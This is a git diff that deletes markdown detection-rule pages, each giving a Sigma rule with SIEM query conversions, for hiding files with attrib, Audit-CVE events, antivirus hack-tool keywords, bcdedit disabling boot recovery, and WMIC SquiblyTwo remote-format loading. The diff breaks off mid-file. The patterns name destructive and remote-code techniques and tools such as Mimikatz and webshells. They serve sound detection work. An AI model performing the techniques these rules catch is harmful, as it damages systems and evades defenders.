-id: 4281cb20-2994-4580-aa63-c8b86d019934
-status: experimental
-description: Detects usage of attrib.exe to hide files from users.
-author: Sami Ruohonen
-date: 2019/01/16
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image: '*\attrib.exe'
-        CommandLine: '* +h *'
-    ini:
-        CommandLine: '*\desktop.ini *'
-    intel:
-        ParentImage: '*\cmd.exe'
-        CommandLine: +R +H +S +A \\*.cui
-        ParentCommandLine: C:\WINDOWS\system32\\*.bat
-    condition: selection and not (ini or intel)
-fields:
-    - CommandLine
-    - ParentCommandLine
-    - User
-tags:
-    - attack.defense_evasion
-    - attack.persistence
-    - attack.t1158
-    - attack.t1564.001
-falsepositives:
-    - igfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)
-    - msiexec.exe hiding desktop.ini
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\attrib.exe" -and $_.message -match "CommandLine.*.* \+h .*") -and  -not ((($_.ID -eq "1") -and ($_.message -match "CommandLine.*.*\\desktop.ini .*" -or ($_.message -match "ParentImage.*.*\\cmd.exe" -and $_.message -match "CommandLine.*\+R \+H \+S \+A \\.*.cui" -and $_.message -match "ParentCommandLine.*C:\\WINDOWS\\system32\\.*.bat"))))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\attrib.exe AND winlog.event_data.CommandLine.keyword:*\ \+h\ *) AND (NOT ((winlog.event_data.CommandLine.keyword:*\\desktop.ini\ * OR (winlog.event_data.ParentImage.keyword:*\\cmd.exe AND winlog.event_data.CommandLine.keyword:\+R\ \+H\ \+S\ \+A\ \\*.cui AND winlog.event_data.ParentCommandLine.keyword:C\:\\WINDOWS\\system32\\*.bat)))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/4281cb20-2994-4580-aa63-c8b86d019934 <<EOF
-{
-  "metadata": {
-    "title": "Hiding Files with Attrib.exe",
-    "description": "Detects usage of attrib.exe to hide files from users.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.persistence",
-      "attack.t1158",
-      "attack.t1564.001"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\attrib.exe AND winlog.event_data.CommandLine.keyword:*\\ \\+h\\ *) AND (NOT ((winlog.event_data.CommandLine.keyword:*\\\\desktop.ini\\ * OR (winlog.event_data.ParentImage.keyword:*\\\\cmd.exe AND winlog.event_data.CommandLine.keyword:\\+R\\ \\+H\\ \\+S\\ \\+A\\ \\\\*.cui AND winlog.event_data.ParentCommandLine.keyword:C\\:\\\\WINDOWS\\\\system32\\\\*.bat)))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\attrib.exe AND winlog.event_data.CommandLine.keyword:*\\ \\+h\\ *) AND (NOT ((winlog.event_data.CommandLine.keyword:*\\\\desktop.ini\\ * OR (winlog.event_data.ParentImage.keyword:*\\\\cmd.exe AND winlog.event_data.CommandLine.keyword:\\+R\\ \\+H\\ \\+S\\ \\+A\\ \\\\*.cui AND winlog.event_data.ParentCommandLine.keyword:C\\:\\\\WINDOWS\\\\system32\\\\*.bat)))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Hiding Files with Attrib.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}\n             User = {{_source.User}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\attrib.exe AND CommandLine.keyword:* \+h *) AND (NOT ((CommandLine.keyword:*\\desktop.ini * OR (ParentImage.keyword:*\\cmd.exe AND CommandLine.keyword:\+R \+H \+S \+A \\*.cui AND ParentCommandLine.keyword:C\:\\WINDOWS\\system32\\*.bat)))))
-```
-
-
-### splunk
-    
-```
-((Image="*\\attrib.exe" CommandLine="* +h *") NOT ((CommandLine="*\\desktop.ini *" OR (ParentImage="*\\cmd.exe" CommandLine="+R +H +S +A \\*.cui" ParentCommandLine="C:\\WINDOWS\\system32\\*.bat")))) | table CommandLine,ParentCommandLine,User
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\attrib.exe" CommandLine="* +h *")  -((event_id="1" (CommandLine="*\\desktop.ini *" OR (ParentImage="*\\cmd.exe" CommandLine="+R +H +S +A \\*.cui" ParentCommandLine="C:\\WINDOWS\\system32\\*.bat")))))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*.*\attrib\.exe)(?=.*.* \+h .*)))(?=.*(?!.*(?:.*(?:.*(?:.*.*\desktop\.ini .*|.*(?:.*(?=.*.*\cmd\.exe)(?=.*\+R \+H \+S \+A \\.*\.cui)(?=.*C:\WINDOWS\system32\\.*\.bat))))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_audit_cve.md b/Atomic_Threat_Coverage/Detection_Rules/win_audit_cve.md
deleted file mode 100644
index 74d16d9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_audit_cve.md
+++ /dev/null
@@ -1,171 +0,0 @@
-| Title                    | Audit CVE Event       |
-|:-------------------------|:------------------|
-| **Description**          | Detects events generated by Windows to indicate the exploitation of a known vulnerability (e.g. CVE-2020-0601) |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/mattifestation/status/1217179698008068096](https://twitter.com/mattifestation/status/1217179698008068096)</li><li>[https://twitter.com/VM_vivisector/status/1217190929330655232](https://twitter.com/VM_vivisector/status/1217190929330655232)</li><li>[https://twitter.com/davisrichardg/status/1217517547576348673](https://twitter.com/davisrichardg/status/1217517547576348673)</li><li>[https://twitter.com/DidierStevens/status/1217533958096924676](https://twitter.com/DidierStevens/status/1217533958096924676)</li><li>[https://twitter.com/FlemmingRiis/status/1217147415482060800](https://twitter.com/FlemmingRiis/status/1217147415482060800)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Audit CVE Event
-id: 48d91a3a-2363-43ba-a456-ca71ac3da5c2
-status: experimental
-description: Detects events generated by Windows to indicate the exploitation of a known vulnerability (e.g. CVE-2020-0601)
-references:
-    - https://twitter.com/mattifestation/status/1217179698008068096
-    - https://twitter.com/VM_vivisector/status/1217190929330655232
-    - https://twitter.com/davisrichardg/status/1217517547576348673
-    - https://twitter.com/DidierStevens/status/1217533958096924676
-    - https://twitter.com/FlemmingRiis/status/1217147415482060800
-author: Florian Roth
-date: 2020/01/15
-logsource:
-    product: windows
-    service: application
-detection:
-    selection:
-        Source: 'Microsoft-Windows-Audit-CVE'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Application | where {($_.message -match "Source.*Microsoft-Windows-Audit-CVE") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Application" AND winlog.event_data.Source:"Microsoft\-Windows\-Audit\-CVE")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/48d91a3a-2363-43ba-a456-ca71ac3da5c2 <<EOF
-{
-  "metadata": {
-    "title": "Audit CVE Event",
-    "description": "Detects events generated by Windows to indicate the exploitation of a known vulnerability (e.g. CVE-2020-0601)",
-    "tags": "",
-    "query": "(winlog.channel:\"Application\" AND winlog.event_data.Source:\"Microsoft\\-Windows\\-Audit\\-CVE\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Application\" AND winlog.event_data.Source:\"Microsoft\\-Windows\\-Audit\\-CVE\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Audit CVE Event'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Source:"Microsoft\-Windows\-Audit\-CVE"
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Application" Source="Microsoft-Windows-Audit-CVE")
-```
-
-
-### logpoint
-    
-```
-Source="Microsoft-Windows-Audit-CVE"
-```
-
-
-### grep
-    
-```
-grep -P '^Microsoft-Windows-Audit-CVE'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_av_relevant_match.md b/Atomic_Threat_Coverage/Detection_Rules/win_av_relevant_match.md
deleted file mode 100644
index bae0e87..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_av_relevant_match.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | Relevant Anti-Virus Event       |
-|:-------------------------|:------------------|
-| **Description**          | This detection method points out highly relevant Antivirus events |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Some software piracy tools (key generators, cracks) are classified as hack tools</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Relevant Anti-Virus Event
-id: 78bc5783-81d9-4d73-ac97-59f6db4f72a8
-description: This detection method points out highly relevant Antivirus events
-author: Florian Roth
-date: 2017/02/19
-logsource:
-    product: windows
-    service: application
-detection:
-    keywords:
-        Message:
-            - "*HTool*"
-            - "*Hacktool*"
-            - "*ASP/Backdoor*"
-            - "*JSP/Backdoor*"
-            - "*PHP/Backdoor*"
-            - "*Backdoor.ASP*"
-            - "*Backdoor.JSP*"
-            - "*Backdoor.PHP*"
-            - "*Webshell*"
-            - "*Portscan*"
-            - "*Mimikatz*"
-            - "*WinCred*"
-            - "*PlugX*"
-            - "*Korplug*"
-            - "*Pwdump*"
-            - "*Chopper*"
-            - "*WmiExec*"
-            - "*Xscan*"
-            - "*Clearlog*"
-            - "*ASPXSpy*"
-    filters:
-        Message:
-            - "*Keygen*"
-            - "*Crack*"
-    condition: keywords and not 1 of filters
-falsepositives:
-    - Some software piracy tools (key generators, cracks) are classified as hack tools
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Application | where {(($_.message -match "Message.*.*HTool.*" -or $_.message -match "Message.*.*Hacktool.*" -or $_.message -match "Message.*.*ASP/Backdoor.*" -or $_.message -match "Message.*.*JSP/Backdoor.*" -or $_.message -match "Message.*.*PHP/Backdoor.*" -or $_.message -match "Message.*.*Backdoor.ASP.*" -or $_.message -match "Message.*.*Backdoor.JSP.*" -or $_.message -match "Message.*.*Backdoor.PHP.*" -or $_.message -match "Message.*.*Webshell.*" -or $_.message -match "Message.*.*Portscan.*" -or $_.message -match "Message.*.*Mimikatz.*" -or $_.message -match "Message.*.*WinCred.*" -or $_.message -match "Message.*.*PlugX.*" -or $_.message -match "Message.*.*Korplug.*" -or $_.message -match "Message.*.*Pwdump.*" -or $_.message -match "Message.*.*Chopper.*" -or $_.message -match "Message.*.*WmiExec.*" -or $_.message -match "Message.*.*Xscan.*" -or $_.message -match "Message.*.*Clearlog.*" -or $_.message -match "Message.*.*ASPXSpy.*") -and  -not (($_.message -match "Message.*.*Keygen.*" -or $_.message -match "Message.*.*Crack.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Application" AND Message.keyword:(*HTool* OR *Hacktool* OR *ASP\/Backdoor* OR *JSP\/Backdoor* OR *PHP\/Backdoor* OR *Backdoor.ASP* OR *Backdoor.JSP* OR *Backdoor.PHP* OR *Webshell* OR *Portscan* OR *Mimikatz* OR *WinCred* OR *PlugX* OR *Korplug* OR *Pwdump* OR *Chopper* OR *WmiExec* OR *Xscan* OR *Clearlog* OR *ASPXSpy*) AND (NOT (Message.keyword:(*Keygen* OR *Crack*))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/78bc5783-81d9-4d73-ac97-59f6db4f72a8 <<EOF
-{
-  "metadata": {
-    "title": "Relevant Anti-Virus Event",
-    "description": "This detection method points out highly relevant Antivirus events",
-    "tags": "",
-    "query": "(winlog.channel:\"Application\" AND Message.keyword:(*HTool* OR *Hacktool* OR *ASP\\/Backdoor* OR *JSP\\/Backdoor* OR *PHP\\/Backdoor* OR *Backdoor.ASP* OR *Backdoor.JSP* OR *Backdoor.PHP* OR *Webshell* OR *Portscan* OR *Mimikatz* OR *WinCred* OR *PlugX* OR *Korplug* OR *Pwdump* OR *Chopper* OR *WmiExec* OR *Xscan* OR *Clearlog* OR *ASPXSpy*) AND (NOT (Message.keyword:(*Keygen* OR *Crack*))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Application\" AND Message.keyword:(*HTool* OR *Hacktool* OR *ASP\\/Backdoor* OR *JSP\\/Backdoor* OR *PHP\\/Backdoor* OR *Backdoor.ASP* OR *Backdoor.JSP* OR *Backdoor.PHP* OR *Webshell* OR *Portscan* OR *Mimikatz* OR *WinCred* OR *PlugX* OR *Korplug* OR *Pwdump* OR *Chopper* OR *WmiExec* OR *Xscan* OR *Clearlog* OR *ASPXSpy*) AND (NOT (Message.keyword:(*Keygen* OR *Crack*))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Relevant Anti-Virus Event'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Message.keyword:(*HTool* *Hacktool* *ASP\/Backdoor* *JSP\/Backdoor* *PHP\/Backdoor* *Backdoor.ASP* *Backdoor.JSP* *Backdoor.PHP* *Webshell* *Portscan* *Mimikatz* *WinCred* *PlugX* *Korplug* *Pwdump* *Chopper* *WmiExec* *Xscan* *Clearlog* *ASPXSpy*) AND (NOT (Message.keyword:(*Keygen* *Crack*))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Application" (Message="*HTool*" OR Message="*Hacktool*" OR Message="*ASP/Backdoor*" OR Message="*JSP/Backdoor*" OR Message="*PHP/Backdoor*" OR Message="*Backdoor.ASP*" OR Message="*Backdoor.JSP*" OR Message="*Backdoor.PHP*" OR Message="*Webshell*" OR Message="*Portscan*" OR Message="*Mimikatz*" OR Message="*WinCred*" OR Message="*PlugX*" OR Message="*Korplug*" OR Message="*Pwdump*" OR Message="*Chopper*" OR Message="*WmiExec*" OR Message="*Xscan*" OR Message="*Clearlog*" OR Message="*ASPXSpy*") NOT ((Message="*Keygen*" OR Message="*Crack*")))
-```
-
-
-### logpoint
-    
-```
-(Message IN ["*HTool*", "*Hacktool*", "*ASP/Backdoor*", "*JSP/Backdoor*", "*PHP/Backdoor*", "*Backdoor.ASP*", "*Backdoor.JSP*", "*Backdoor.PHP*", "*Webshell*", "*Portscan*", "*Mimikatz*", "*WinCred*", "*PlugX*", "*Korplug*", "*Pwdump*", "*Chopper*", "*WmiExec*", "*Xscan*", "*Clearlog*", "*ASPXSpy*"]  -(Message IN ["*Keygen*", "*Crack*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*.*HTool.*|.*.*Hacktool.*|.*.*ASP/Backdoor.*|.*.*JSP/Backdoor.*|.*.*PHP/Backdoor.*|.*.*Backdoor\.ASP.*|.*.*Backdoor\.JSP.*|.*.*Backdoor\.PHP.*|.*.*Webshell.*|.*.*Portscan.*|.*.*Mimikatz.*|.*.*WinCred.*|.*.*PlugX.*|.*.*Korplug.*|.*.*Pwdump.*|.*.*Chopper.*|.*.*WmiExec.*|.*.*Xscan.*|.*.*Clearlog.*|.*.*ASPXSpy.*))(?=.*(?!.*(?:.*(?=.*(?:.*.*Keygen.*|.*.*Crack.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_bootconf_mod.md b/Atomic_Threat_Coverage/Detection_Rules/win_bootconf_mod.md
deleted file mode 100644
index d38b74f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_bootconf_mod.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | Modification of Boot Configuration       |
-|:-------------------------|:------------------|
-| **Description**          | Identifies use of the bcdedit command to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0040: Impact](https://attack.mitre.org/tactics/TA0040)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1490: Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1490: Inhibit System Recovery](../Triggers/T1490.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.yaml)</li><li>[https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html](https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html)</li></ul>  |
-| **Author**               | E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Modification of Boot Configuration
-id: 1444443e-6757-43e4-9ea4-c8fc705f79a2
-description: Identifies use of the bcdedit command to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive
-    technique.
-status: experimental
-author: E.M. Anhaus (orignally from Atomic Blue Detections, Endgame), oscd.community
-date: 2019/10/24
-modified: 2019/11/11
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.yaml
-    - https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html
-tags:
-    - attack.impact
-    - attack.t1490
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Image|endswith: \bcdedit.exe
-        CommandLine|contains: set
-    selection2:
-        - CommandLine|contains|all:
-            - bootstatuspolicy
-            - ignoreallfailures
-        - CommandLine|contains|all:
-            - recoveryenabled
-            - 'no'
-    condition: selection1 and selection2
-fields:
-    - ComputerName
-    - User
-    - CommandLine
-falsepositives:
-    - Unlikely
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*\\bcdedit.exe" -and $_.message -match "CommandLine.*.*set.*") -and (($_.message -match "CommandLine.*.*bootstatuspolicy.*" -and $_.message -match "CommandLine.*.*ignoreallfailures.*") -or ($_.message -match "CommandLine.*.*recoveryenabled.*" -and $_.message -match "CommandLine.*.*no.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\bcdedit.exe AND winlog.event_data.CommandLine.keyword:*set*) AND ((winlog.event_data.CommandLine.keyword:*bootstatuspolicy* AND winlog.event_data.CommandLine.keyword:*ignoreallfailures*) OR (winlog.event_data.CommandLine.keyword:*recoveryenabled* AND winlog.event_data.CommandLine.keyword:*no*)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1444443e-6757-43e4-9ea4-c8fc705f79a2 <<EOF
-{
-  "metadata": {
-    "title": "Modification of Boot Configuration",
-    "description": "Identifies use of the bcdedit command to delete boot configuration data. This tactic is sometimes used as by malware or an attacker as a destructive technique.",
-    "tags": [
-      "attack.impact",
-      "attack.t1490"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\bcdedit.exe AND winlog.event_data.CommandLine.keyword:*set*) AND ((winlog.event_data.CommandLine.keyword:*bootstatuspolicy* AND winlog.event_data.CommandLine.keyword:*ignoreallfailures*) OR (winlog.event_data.CommandLine.keyword:*recoveryenabled* AND winlog.event_data.CommandLine.keyword:*no*)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\bcdedit.exe AND winlog.event_data.CommandLine.keyword:*set*) AND ((winlog.event_data.CommandLine.keyword:*bootstatuspolicy* AND winlog.event_data.CommandLine.keyword:*ignoreallfailures*) OR (winlog.event_data.CommandLine.keyword:*recoveryenabled* AND winlog.event_data.CommandLine.keyword:*no*)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Modification of Boot Configuration'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\nComputerName = {{_source.ComputerName}}\n        User = {{_source.User}}\n CommandLine = {{_source.CommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\bcdedit.exe AND CommandLine.keyword:*set*) AND ((CommandLine.keyword:*bootstatuspolicy* AND CommandLine.keyword:*ignoreallfailures*) OR (CommandLine.keyword:*recoveryenabled* AND CommandLine.keyword:*no*)))
-```
-
-
-### splunk
-    
-```
-((Image="*\\bcdedit.exe" CommandLine="*set*") ((CommandLine="*bootstatuspolicy*" CommandLine="*ignoreallfailures*") OR (CommandLine="*recoveryenabled*" CommandLine="*no*"))) | table ComputerName,User,CommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image="*\\bcdedit.exe" CommandLine="*set*") ((CommandLine="*bootstatuspolicy*" CommandLine="*ignoreallfailures*") OR (CommandLine="*recoveryenabled*" CommandLine="*no*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*.*\bcdedit\.exe)(?=.*.*set.*)))(?=.*(?:.*(?:.*(?:.*(?=.*.*bootstatuspolicy.*)(?=.*.*ignoreallfailures.*))|.*(?:.*(?=.*.*recoveryenabled.*)(?=.*.*no.*))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_bypass_squiblytwo.md b/Atomic_Threat_Coverage/Detection_Rules/win_bypass_squiblytwo.md
deleted file mode 100644
index 2367f16..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_bypass_squiblytwo.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | SquiblyTwo       |
-|:-------------------------|:------------------|
-| **Description**          | Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html](https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html)</li><li>[https://twitter.com/mattifestation/status/986280382042595328](https://twitter.com/mattifestation/status/986280382042595328)</li></ul>  |
-| **Author**               | Markus Neis / Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: SquiblyTwo
-id: 8d63dadf-b91b-4187-87b6-34a1114577ea
-status: experimental
-description: Detects WMI SquiblyTwo Attack with possible renamed WMI by looking for imphash
-references:
-    - https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html
-    - https://twitter.com/mattifestation/status/986280382042595328
-tags:
-    - attack.defense_evasion
-    - attack.t1047
-author: Markus Neis / Florian Roth
-date: 2019/01/16
-falsepositives:
-    - Unknown
-level: medium
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Image:
-            - '*\wmic.exe'
-        CommandLine:
-            - wmic * *format:\"http*
-            - wmic * /format:'http
-            - wmic * /format:http*
-    selection2:
-        Imphash:
-            - 1B1A3F43BF37B5BFE60751F2EE2F326E
-            - 37777A96245A3C74EB217308F3546F4C
-            - 9D87C9D67CE724033C0B40CC4CA1B206
-        CommandLine:
-            - '* *format:\"http*'
-            - '* /format:''http'
-            - '* /format:http*'
-    condition: 1 of them
-
-```
-
-
-
-
-
-### powershell
-    
-```
